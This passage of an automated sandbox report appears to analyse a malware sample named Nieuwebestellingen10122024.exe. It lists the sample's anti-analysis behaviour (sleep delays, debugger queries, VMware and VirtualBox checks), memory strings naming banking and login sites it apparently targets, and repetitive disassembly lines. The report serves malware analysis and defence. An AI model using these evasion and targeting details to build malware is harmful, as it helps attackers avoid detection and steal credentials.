                Source: C:\Windows\SysWOW64\wscript.exeWindow / User API: threadDelayed 9675Jump to behavior
                Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeAPI coverage: 0.8 %
                Source: C:\Windows\SysWOW64\wscript.exeAPI coverage: 3.1 %
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1848Thread sleep time: -3689348814741908s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\wscript.exe TID: 3292Thread sleep count: 297 > 30Jump to behavior
                Source: C:\Windows\SysWOW64\wscript.exe TID: 3292Thread sleep time: -594000s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\wscript.exe TID: 3292Thread sleep count: 9675 > 30Jump to behavior
                Source: C:\Windows\SysWOW64\wscript.exe TID: 3292Thread sleep time: -19350000s >= -30000sJump to behavior
                Source: C:\Program Files (x86)\lUojpVVEubSRrtYktEitslorEEcrhqSoLCCXKdfuXGgLvD\tCyxXhRNgdPI.exe TID: 6036Thread sleep time: -60000s >= -30000sJump to behavior
                Source: C:\Program Files (x86)\lUojpVVEubSRrtYktEitslorEEcrhqSoLCCXKdfuXGgLvD\tCyxXhRNgdPI.exe TID: 6036Thread sleep time: -45000s >= -30000sJump to behavior
                Source: C:\Program Files (x86)\lUojpVVEubSRrtYktEitslorEEcrhqSoLCCXKdfuXGgLvD\tCyxXhRNgdPI.exe TID: 6036Thread sleep count: 31 > 30Jump to behavior
                Source: C:\Program Files (x86)\lUojpVVEubSRrtYktEitslorEEcrhqSoLCCXKdfuXGgLvD\tCyxXhRNgdPI.exe TID: 6036Thread sleep time: -31000s >= -30000sJump to behavior
                Source: C:\Windows\System32\svchost.exe TID: 5760Thread sleep time: -30000s >= -30000s
                Source: C:\Windows\System32\svchost.exeFile opened: PhysicalDrive0
                Source: C:\Windows\SysWOW64\wscript.exeLast function: Thread delayed
                Source: C:\Windows\SysWOW64\wscript.exeLast function: Thread delayed
                Source: C:\Windows\SysWOW64\wscript.exeCode function: 12_2_0036C7A0 FindFirstFileW,FindNextFileW,FindClose,12_2_0036C7A0
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: Nieuwebestellingen10122024.exe, 00000000.00000002.2163050689.000001DF35FC1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: QEMUP
                Source: Amcache.hve.8.drBinary or memory string: VMware
                Source: Nieuwebestellingen10122024.exe, 00000000.00000002.2163050689.000001DF35FC1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: "SOFTWARE\VMware, Inc.\VMware ToolsP
                Source: 2361o4QI.12.drBinary or memory string: interactivebrokers.co.inVMware20,11696428655d
                Source: Nieuwebestellingen10122024.exe, 00000000.00000002.2163050689.000001DF364BE000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: C:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
                Source: 2361o4QI.12.drBinary or memory string: Interactive Brokers - COM.HKVMware20,11696428655
                Source: 2361o4QI.12.drBinary or memory string: global block list test formVMware20,11696428655
                Source: Amcache.hve.8.drBinary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
                Source: svchost.exe, 00000014.00000002.4501629386.0000028F71855000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000014.00000002.4501606551.0000028F7182C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000014.00000002.4500154632.0000028F6C22B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                Source: Nieuwebestellingen10122024.exe, 00000000.00000002.2163050689.000001DF364BE000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: VMWARE
                Source: Nieuwebestellingen10122024.exe, 00000000.00000002.2163050689.000001DF364BE000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: InstallPath%C:\PROGRAM FILES\VMWARE\VMWARE TOOLS\'C:\WINDOWS\system32\drivers\vmmouse.sys&C:\WINDOWS\system32\drivers\vmhgfs.sys
                Source: 2361o4QI.12.drBinary or memory string: account.microsoft.com/profileVMware20,11696428655u
                Source: Amcache.hve.8.drBinary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
                Source: 2361o4QI.12.drBinary or memory string: Interactive Brokers - GDCDYNVMware20,11696428655p
                Source: Amcache.hve.8.drBinary or memory string: vmci.sys
                Source: 2361o4QI.12.drBinary or memory string: AMC password management pageVMware20,11696428655
                Source: 2361o4QI.12.drBinary or memory string: tasks.office.comVMware20,11696428655o
                Source: Nieuwebestellingen10122024.exe, 00000000.00000002.2163050689.000001DF364BE000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: C:\WINDOWS\system32\drivers\vmmouse.sys
                Source: Nieuwebestellingen10122024.exe, 00000000.00000002.2163050689.000001DF364BE000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: vmware
                Source: 2361o4QI.12.drBinary or memory string: interactivebrokers.comVMware20,11696428655
                Source: 2361o4QI.12.drBinary or memory string: turbotax.intuit.comVMware20,11696428655t
                Source: Nieuwebestellingen10122024.exe, 00000000.00000002.2163050689.000001DF364BE000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: C:\WINDOWS\system32\drivers\vmhgfs.sys
                Source: 2361o4QI.12.drBinary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696428655
                Source: Amcache.hve.8.drBinary or memory string: VMware20,1
                Source: Nieuwebestellingen10122024.exe, 00000000.00000002.2163050689.000001DF35FC1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: &C:\WINDOWS\system32\drivers\vmhgfs.sysP
                Source: Amcache.hve.8.drBinary or memory string: Microsoft Hyper-V Generation Counter
                Source: Amcache.hve.8.drBinary or memory string: NECVMWar VMware SATA CD00
                Source: Amcache.hve.8.drBinary or memory string: VMware Virtual disk SCSI Disk Device
                Source: 2361o4QI.12.drBinary or memory string: Interactive Brokers - HKVMware20,11696428655]
                Source: Amcache.hve.8.drBinary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
                Source: Amcache.hve.8.drBinary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
                Source: Amcache.hve.8.drBinary or memory string: VMware PCI VMCI Bus Device
                Source: Nieuwebestellingen10122024.exe, 00000000.00000002.2163050689.000001DF364BE000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: noValueButYesKey)C:\WINDOWS\system32\drivers\VBoxMouse.sys
                Source: Nieuwebestellingen10122024.exe, 00000000.00000002.2163050689.000001DF364BE000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: C:\WINDOWS\system32\drivers\VBoxMouse.sys
                Source: Amcache.hve.8.drBinary or memory string: VMware VMCI Bus Device
                Source: Amcache.hve.8.drBinary or memory string: VMware Virtual RAM
                Source: Amcache.hve.8.drBinary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
                Source: Nieuwebestellingen10122024.exe, 00000000.00000002.2163050689.000001DF35FC1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: VMWAREP
                Source: 2361o4QI.12.drBinary or memory string: bankofamerica.comVMware20,11696428655x
                Source: 2361o4QI.12.drBinary or memory string: Test URL for global passwords blocklistVMware20,11696428655
                Source: Amcache.hve.8.drBinary or memory string: vmci.inf_amd64_68ed49469341f563
                Source: 2361o4QI.12.drBinary or memory string: Canara Transaction PasswordVMware20,11696428655x
                Source: Amcache.hve.8.drBinary or memory string: VMware Virtual USB Mouse
                Source: Nieuwebestellingen10122024.exe, 00000000.00000002.2163050689.000001DF35FC1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: vmwareP
                Source: Amcache.hve.8.drBinary or memory string: vmci.syshbin
                Source: Amcache.hve.8.drBinary or memory string: VMware, Inc.
                Source: 2361o4QI.12.drBinary or memory string: discord.comVMware20,11696428655f
                Source: Amcache.hve.8.drBinary or memory string: VMware20,1hbin@
                Source: Nieuwebestellingen10122024.exe, 00000000.00000002.2163050689.000001DF35FC1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: )C:\WINDOWS\system32\drivers\VBoxMouse.sysP
                Source: Amcache.hve.8.drBinary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
                Source: Amcache.hve.8.drBinary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
                Source: 2361o4QI.12.drBinary or memory string: Canara Transaction PasswordVMware20,11696428655}
                Source: Amcache.hve.8.drBinary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
                Source: 2361o4QI.12.drBinary or memory string: Interactive Brokers - EU East & CentralVMware20,11696428655
                Source: 2361o4QI.12.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696428655^
                Source: Nieuwebestellingen10122024.exe, 00000000.00000002.2163050689.000001DF35FC1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: %C:\PROGRAM FILES\VMWARE\VMWARE TOOLS\P
                Source: tCyxXhRNgdPI.exe, 0000000D.00000002.4499007998.000000000062F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll^
                Source: 2361o4QI.12.drBinary or memory string: secure.bankofamerica.comVMware20,11696428655|UE
                Source: Nieuwebestellingen10122024.exe, 00000000.00000002.2163050689.000001DF364BE000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: VMWARE"SOFTWARE\VMware, Inc.\VMware ToolsLHARDWARE\DEVICEMAP\Scsi\Scsi Port 1\Scsi Bus 0\Target Id 0\Logical Unit Id 0LHARDWARE\DEVICEMAP\Scsi\Scsi Port 2\Scsi Bus 0\Target Id 0\Logical Unit Id 0'SYSTEM\ControlSet001\Services\Disk\Enum
                Source: Nieuwebestellingen10122024.exe, 00000000.00000002.2163050689.000001DF364BE000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: VMware SVGA II
                Source: 2361o4QI.12.drBinary or memory string: www.interactivebrokers.comVMware20,11696428655}
                Source: Amcache.hve.8.drBinary or memory string: c:/windows/system32/drivers/vmci.sys
                Source: 2361o4QI.12.drBinary or memory string: Interactive Brokers - EU WestVMware20,11696428655n
                Source: 2361o4QI.12.drBinary or memory string: outlook.office365.comVMware20,11696428655t
                Source: 2361o4QI.12.drBinary or memory string: microsoft.visualstudio.comVMware20,11696428655x
                Source: Amcache.hve.8.drBinary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
                Source: Nieuwebestellingen10122024.exe, 00000000.00000002.2163050689.000001DF35FC1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: VMware SVGA IIP
                Source: wscript.exe, 0000000C.00000002.4498888550.0000000000866000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                Source: 2361o4QI.12.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696428655
                Source: 2361o4QI.12.drBinary or memory string: outlook.office.comVMware20,11696428655s
                Source: firefox.exe, 0000001E.00000002.2665940294.00000257385EE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll{{
                Source: 2361o4QI.12.drBinary or memory string: www.interactivebrokers.co.inVMware20,11696428655~
                Source: 2361o4QI.12.drBinary or memory string: ms.portal.azure.comVMware20,11696428655
                Source: Nieuwebestellingen10122024.exe, 00000000.00000002.2163050689.000001DF35FC1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 'C:\WINDOWS\system32\drivers\vmmouse.sysP
                Source: Amcache.hve.8.drBinary or memory string: VMware-56 4d 43 71 48 15 3d ed-ae e6 c7 5a ec d9 3b f0
                Source: Amcache.hve.8.drBinary or memory string: vmci.syshbin`
                Source: 2361o4QI.12.drBinary or memory string: Interactive Brokers - NDCDYNVMware20,11696428655z
                Source: Amcache.hve.8.drBinary or memory string: \driver\vmci,\driver\pci
                Source: Nieuwebestellingen10122024.exe, 00000000.00000002.2163050689.000001DF364BE000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: SOFTWARE\VMware, Inc.\VMware Tools
                Source: 2361o4QI.12.drBinary or memory string: dev.azure.comVMware20,11696428655j
                Source: Amcache.hve.8.drBinary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
                Source: 2361o4QI.12.drBinary or memory string: netportal.hdfcbank.comVMware20,11696428655
                Source: Amcache.hve.8.drBinary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
                Source: 2361o4QI.12.drBinary or memory string: trackpan.utiitsl.comVMware20,11696428655h
                Source: Nieuwebestellingen10122024.exe, 00000000.00000002.2163050689.000001DF35FC1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: "SOFTWARE\VMware, Inc.\VMware Tools
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
                Source: C:\Users\user\Desktop\Nieuwebestellingen10122024.exeProcess queried: DebugPortJump to behavior
                Source: C:\Users\user\Desktop\Nieuwebestellingen10122024.exeProcess queried: DebugPortJump to behavior
                Source: C:\Windows\SysWOW64\wscript.exeProcess queried: DebugPortJump to behavior
                Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 5_2_032FD1C0 rdtsc 5_2_032FD1C0
                Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 5_2_00417BA3 LdrLoadDll,5_2_00417BA3
                Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 5_2_032AF32A mov eax, dword ptr fs:[00000030h]5_2_032AF32A
                Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 5_2_03277330 mov eax, dword ptr fs:[00000030h]5_2_03277330
                Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 5_2_0334132D mov eax, dword ptr fs:[00000030h]5_2_0334132D
                Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 5_2_0334132D mov eax, dword ptr fs:[00000030h]5_2_0334132D
                Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 5_2_032BA30B mov eax, dword ptr fs:[00000030h]5_2_032BA30B
                Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 5_2_032BA30B mov eax, dword ptr fs:[00000030h]5_2_032BA30B
                Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 5_2_032BA30B mov eax, dword ptr fs:[00000030h]5_2_032BA30B
                Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 5_2_0327C310 mov ecx, dword ptr fs:[00000030h]5_2_0327C310
                Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 5_2_032A0310 mov ecx, dword ptr fs:[00000030h]5_2_032A0310
                Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 5_2_0330930B mov eax, dword ptr fs:[00000030h]5_2_0330930B
                Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 5_2_0330930B mov eax, dword ptr fs:[00000030h]5_2_0330930B
                Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 5_2_0330930B mov eax, dword ptr fs:[00000030h]5_2_0330930B
                Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 5_2_0332437C mov eax, dword ptr fs:[00000030h]5_2_0332437C
                Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 5_2_0333F367 mov eax, dword ptr fs:[00000030h]5_2_0333F367
                Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 5_2_03287370 mov eax, dword ptr fs:[00000030h]5_2_03287370
                Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 5_2_03287370 mov eax, dword ptr fs:[00000030h]5_2_03287370
                Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 5_2_03287370 mov eax, dword ptr fs:[00000030h]5_2_03287370
                Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 5_2_0334A352 mov eax, dword ptr fs:[00000030h]5_2_0334A352
                Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 5_2_0327D34C mov eax, dword ptr fs:[00000030h]5_2_0327D34C
                Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 5_2_0327D34C mov eax, dword ptr fs:[00000030h]5_2_0327D34C
                Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 5_2_0330035C mov eax, dword ptr fs:[00000030h]5_2_0330035C
                Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 5_2_0330035C mov eax, dword ptr fs:[00000030h]5_2_0330035C
                Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 5_2_0330035C mov eax, dword ptr fs:[00000030h]5_2_0330035C
                Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 5_2_0330035C mov ecx, dword ptr fs:[00000030h]5_2_0330035C
                Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 5_2_0330035C mov eax, dword ptr fs:[00000030h]5_2_0330035C
                Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 5_2_0330035C mov eax, dword ptr fs:[00000030h]5_2_0330035C
                Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 5_2_03355341 mov eax, dword ptr fs:[00000030h]5_2_03355341
                Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 5_2_03279353 mov eax, dword ptr fs:[00000030h]5_2_03279353
                Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 5_2_03279353 mov eax, dword ptr fs:[00000030h]5_2_03279353
                Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 5_2_03302349 mov eax, dword ptr fs:[00000030h]5_2_03302349
                Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 5_2_03302349 mov eax, dword ptr fs:[00000030h]5_2_03302349
                Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 5_2_03302349 mov eax, dword ptr fs:[00000030h]5_2_03302349
                Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 5_2_03302349 mov eax, dword ptr fs:[00000030h]5_2_03302349
                Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 5_2_03302349 mov eax, dword ptr fs:[00000030h]5_2_03302349
                Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 5_2_03302349 mov eax, dword ptr fs:[00000030h]5_2_03302349
                Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 5_2_03302349 mov eax, dword ptr fs:[00000030h]5_2_03302349
                Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 5_2_03302349 mov eax, dword ptr fs:[00000030h]5_2_03302349
                Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 5_2_03302349 mov eax, dword ptr fs:[00000030h]5_2_03302349
                Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 5_2_03302349 mov eax, dword ptr fs:[00000030h]5_2_03302349
                Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 5_2_03302349 mov eax, dword ptr fs:[00000030h]5_2_03302349
                Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 5_2_03302349 mov eax, dword ptr fs:[00000030h]5_2_03302349
                Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 5_2_03302349 mov eax, dword ptr fs:[00000030h]5_2_03302349
                Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 5_2_03302349 mov eax, dword ptr fs:[00000030h]5_2_03302349
                Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 5_2_03302349 mov eax, dword ptr fs:[00000030h]5_2_03302349
                Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 5_2_032B33A0 mov eax, dword ptr fs:[00000030h]5_2_032B33A0
                Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 5_2_032B33A0 mov eax, dword ptr fs:[00000030h]5_2_032B33A0
                Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 5_2_032A33A5 mov eax, dword ptr fs:[00000030h]5_2_032A33A5
                Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 5_2_032A438F mov eax, dword ptr fs:[00000030h]5_2_032A438F
                Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 5_2_032A438F mov eax, dword ptr fs:[00000030h]5_2_032A438F
                Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 5_2_0335539D mov eax, dword ptr fs:[00000030h]5_2_0335539D
                Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 5_2_0327E388 mov eax, dword ptr fs:[00000030h]5_2_0327E388
                Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 5_2_0327E388 mov eax, dword ptr fs:[00000030h]5_2_0327E388
                Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 5_2_0327E388 mov eax, dword ptr fs:[00000030h]5_2_0327E388
                Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 5_2_03278397 mov eax, dword ptr fs:[00000030h]5_2_03278397
                Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 5_2_03278397 mov eax, dword ptr fs:[00000030h]5_2_03278397
                Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 5_2_03278397 mov eax, dword ptr fs:[00000030h]5_2_03278397
                Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 5_2_032D739A mov eax, dword ptr fs:[00000030h]5_2_032D739A
                Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 5_2_032D739A mov eax, dword ptr fs:[00000030h]5_2_032D739A
                Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 5_2_032903E9 mov eax, dword ptr fs:[00000030h]5_2_032903E9
                Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 5_2_032903E9 mov eax, dword ptr fs:[00000030h]5_2_032903E9
                Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 5_2_032903E9 mov eax, dword ptr fs:[00000030h]5_2_032903E9
                Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 5_2_032903E9 mov eax, dword ptr fs:[00000030h]5_2_032903E9
                Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 5_2_032903E9 mov eax, dword ptr fs:[00000030h]5_2_032903E9
                Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 5_2_032903E9 mov eax, dword ptr fs:[00000030h]5_2_032903E9
                Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 5_2_032903E9 mov eax, dword ptr fs:[00000030h]5_2_032903E9
                Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 5_2_032903E9 mov eax, dword ptr fs:[00000030h]5_2_032903E9
                Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 5_2_033553FC mov eax, dword ptr fs:[00000030h]5_2_033553FC
                Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 5_2_032B63FF mov eax, dword ptr fs:[00000030h]5_2_032B63FF
                Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 5_2_0333F3E6 mov eax, dword ptr fs:[00000030h]5_2_0333F3E6
                Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 5_2_0329E3F0 mov eax, dword ptr fs:[00000030h]5_2_0329E3F0
                Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 5_2_0329E3F0 mov eax, dword ptr fs:[00000030h]5_2_0329E3F0
                Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 5_2_0329E3F0 mov eax, dword ptr fs:[00000030h]5_2_0329E3F0
                Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 5_2_0333B3D0 mov ecx, dword ptr fs:[00000030h]5_2_0333B3D0
                Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 5_2_0328A3C0 mov eax, dword ptr fs:[00000030h]5_2_0328A3C0
                Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 5_2_0328A3C0 mov eax, dword ptr fs:[00000030h]5_2_0328A3C0
                Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 5_2_0328A3C0 mov eax, dword ptr fs:[00000030h]5_2_0328A3C0
                Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 5_2_0328A3C0 mov eax, dword ptr fs:[00000030h]5_2_0328A3C0
                Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 5_2_0328A3C0 mov eax, dword ptr fs:[00000030h]5_2_0328A3C0
                Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 5_2_0328A3C0 mov eax, dword ptr fs:[00000030h]5_2_0328A3C0
                Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 5_2_032883C0 mov eax, dword ptr fs:[00000030h]5_2_032883C0
                Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 5_2_032883C0 mov eax, dword ptr fs:[00000030h]5_2_032883C0
                Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 5_2_032883C0 mov eax, dword ptr fs:[00000030h]5_2_032883C0
                Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 5_2_032883C0 mov eax, dword ptr fs:[00000030h]5_2_032883C0
                Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 5_2_0333C3CD mov eax, dword ptr fs:[00000030h]5_2_0333C3CD
                Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 5_2_03355227 mov eax, dword ptr fs:[00000030h]5_2_03355227
                Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 5_2_0327823B mov eax, dword ptr fs:[00000030h]5_2_0327823B
                Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 5_2_032B7208 mov eax, dword ptr fs:[00000030h]5_2_032B7208
                Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 5_2_032B7208 mov eax, dword ptr fs:[00000030h]5_2_032B7208
                Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 5_2_03330274 mov eax, dword ptr fs:[00000030h]5_2_03330274
                Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 5_2_03330274 mov eax, dword ptr fs:[00000030h]5_2_03330274
                Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 5_2_03330274 mov eax, dword ptr fs:[00000030h]5_2_03330274
                Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 5_2_03330274 mov eax, dword ptr fs:[00000030h]5_2_03330274
                Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 5_2_03330274 mov eax, dword ptr fs:[00000030h]5_2_03330274
                Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 5_2_03330274 mov eax, dword ptr fs:[00000030h]5_2_03330274
                Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 5_2_03330274 mov eax, dword ptr fs:[00000030h]5_2_03330274
                Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 5_2_03330274 mov eax, dword ptr fs:[00000030h]5_2_03330274
                Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 5_2_03330274 mov eax, dword ptr fs:[00000030h]5_2_03330274
                Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 5_2_03330274 mov eax, dword ptr fs:[00000030h]5_2_03330274
                Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 5_2_03330274 mov eax, dword ptr fs:[00000030h]5_2_03330274
                Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 5_2_03330274 mov eax, dword ptr fs:[00000030h]5_2_03330274
                Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 5_2_03284260 mov eax, dword ptr fs:[00000030h]5_2_03284260
                Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 5_2_03284260 mov eax, dword ptr fs:[00000030h]5_2_03284260
                Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 5_2_03284260 mov eax, dword ptr fs:[00000030h]5_2_03284260
                Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 5_2_0327826B mov eax, dword ptr fs:[00000030h]5_2_0327826B
                Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 5_2_032C1270 mov eax, dword ptr fs:[00000030h]5_2_032C1270
                Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 5_2_032C1270 mov eax, dword ptr fs:[00000030h]5_2_032C1270
                Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 5_2_032A9274 mov eax, dword ptr fs:[00000030h]5_2_032A9274
                Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 5_2_0334D26B mov eax, dword ptr fs:[00000030h]5_2_0334D26B
                Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 5_2_0334D26B mov eax, dword ptr fs:[00000030h]5_2_0334D26B
